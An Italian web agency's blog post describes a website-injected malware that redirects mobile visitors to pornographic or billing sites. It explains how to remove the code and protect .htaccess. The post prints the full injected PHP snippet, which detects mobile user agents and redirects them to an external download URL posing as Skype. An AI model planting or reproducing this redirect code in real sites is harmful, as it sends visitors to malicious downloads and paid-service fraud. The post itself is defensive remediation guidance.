Un nuovo tipo di Malware sta girando in rete: principalmente colpisce dispositivi mobile quali smartphone e tablet.Smartphone foto

Si tratta di un reindirizzamento automatico che porta l'utente, che cerca di accedere ad un sito, su siti esterni il cui contenuto è solitamente pornografico o a carattere pubblicitario/divulgatorio.

Essi, inoltre, possono attivare anche servizi a pagamento sulla Sim Card del telefono in uso, i quali comportano costi elevati.

Di seguito le procedure per arginare questo problema e alcuni consigli utili...

Cos'è e come agisce?

Molto spesso questo tipo di malware colpisce siti vecchi o che presentano alta vulnerabilità.

La caratteristica contraddistintiva di questo malware è che lavora solo su dispositivi mobile (interfaccia mobile), senza apportare modifiche al sito se visualizzato da pc (interfaccia desktop). Ciò è reso possibile da un particolare file usato dai template dei siti, per modificare la visualizzazione dello stesso, e dal browser, per determinare quale tipo di dispositivo sta visualizzando il sito in questione. Il file ha estensione .htaccess ed è solitamente localizzato nella directory del template del sito, accessibile via FTP.

Il malware che è stato "inniettato" all'interno del nostro sito non è altro che una porzione di codice che definisce alcuni semplice regole al browser, specificando le azioni da intraprendere in base al dispositivo che visualizza il sito.

Il codice è il seguente:

 <?phpfunction detect_mobile_device(){    // check if the user agent value claims to be windows but not windows mobile
if(stristr(@$_SERVER['HTTP_USER_AGENT'],'windows')&&!stristr(@$_SERVER['HTTP_USER_AGENT'],'windows ce'))
return false;    // check if the user agent gives away any tell tale signs it's a mobile browser
if(preg_match('/up.browser|up. link |windows ce|iemobile|mini|mmp|symbian|midp|wap|phone|pocket|mobile|pda|psp/i',    @$_SERVER['HTTP_USER_AGENT']))
return true;    // check the http accept header to see if wap.wml or wap.xhtml support is claimed
if(isset($_SERVER['HTTP_ACCEPT'])&&(stristr($_SERVER['HTTP_ACCEPT'],'text/vnd.wap.wml')||    stristr($_SERVER['HTTP_ACCEPT'],'application/vnd.wap.xhtml xml')))
return true;    // check if there are any tell tales signs it's a mobile device from the server headers
if(isset($_SERVER['HTTP_X_WAP_PROFILE'])||isset($_SERVER['HTTP_PROFILE'])||    isset($_SERVER['X-OperaMini-Features'])||isset($_SERVER['UA-pixels']))
return true;    // build an array with the first four characters from the most common mobile user agents
$a = array ('acs-','alav','alca','amoi','audi','aste','avan','benq','bird','blac',    'bla z','brew','cell','cldc','cmd-','dang','doco','eric','hipt','inno', 
   'ipaq','java', 'jigs','kddi','keji','leno','lg-c','lg-d','lg-g','lge-',    'maui','maxo','midp','mi ts','mmef','mobi','mot-','moto','mwbp','nec-',
    'newt','noki','opwv','palm','pana' ,'pant','pdxg','phil','play','pluc',    'port','prox','qtek','qwap','sage','sams','s any','sch-','sec-','send', 
   'seri','sgh-','shar','sie-','siem','smal','smar','sony ','sph-','symb',    't-mo','teli','tim-','tosh','tsm-','upg1','upsi','vk-v','voda',' w3c ',
    'wap-','wapa','wapi','wapp','wapr','webc','winw','winw','xda','xda-');   
// check if the first four characters of the current user agent are set as a key in the array
if(isset($a[ substr (@$_SERVER['HTTP_USER_AGENT'],0,4)]))
return true;}
if (detect_mobile_device()) {
header("Location: http://file0a.net/skype/12735/skype.auto?src=other");
exit();

}?>

 Come agire?

Innanzitutto localizzate il codice malevolo: solitamente è localizzato nel file .htaccess ma molto dipende dal CMS utilizzato: essendo codice PHP potrebbe essere localizzato nel footerdownload (footer.php) o nell'header del vostro template (header.php). Una volta localizzato il codice, eliminatelo utilizzando un editor di testo.

In questo caso possiamo procedere in due modi:

  1. Utilizzando l'editor del CMS: se il CMS lo consente, possiamo operare sui file del template direttamente dal back-end del sito. Dunque localizziamo il codice, lo eliminiamo, salviamo il tutto e ricarichiamo la pagina.
  2. Accedendo via FTP: possiamo localizzare il file che contiene il codice anche andando a ricercare nell'intera directory del sito, procedendo analogamente come fatto nel caso precedente.

 

Prevenire è meglio che curare!

Essendo un tipo di attacco che lavora sui file, le tecniche preventive e di restore che si possono adottare sono le seguenti:

  • Politiche di backup/restore: primo tra tutti c'è il backup. Anche se non siete esperti di codice o non riuscite a localizzare il codice malevolo, un backup fatto quantoprima può salvare il sito, ripristinandolo. E' sempre consigliato fare un backup del sito e del database ogni qualvolta si apportano modifiche notevoli all'interno del sito.
  • Aggiornare il sito/CMS: mantenere il sito e tutti i plugin aggiornati può contribuire a rendere il sito più sicuro e meno vulnerabile ad attachi come questo.
  • Proteggere il file .htaccess: un metodo un po più avanzato di prevenzione è limitare gli accessi al file, inserendo all'interno dello stesso alcune righe di codice che scandiscono i permessi di scrittura/lettura. la stringa da inserire è la seguente: 
# proteggi il file htaccess da scrittura 
<Files .htaccess>order allow,deny
deny from all
</Files>

Nel caso si dovessero riscontrare ulteriori problemi, non esitate a contattare Sudiodichiara srl per ulteriori chiarimenti e/o supporto al seguente numero: 0835 1766503, o al seguente indirizzo mail: Questo indirizzo email è protetto dagli spambots. È necessario abilitare JavaScript per vederlo..

Ricerca nel sito

Iscriviti alla newsletter

ManifestoCorsiDefinitivo

Go to top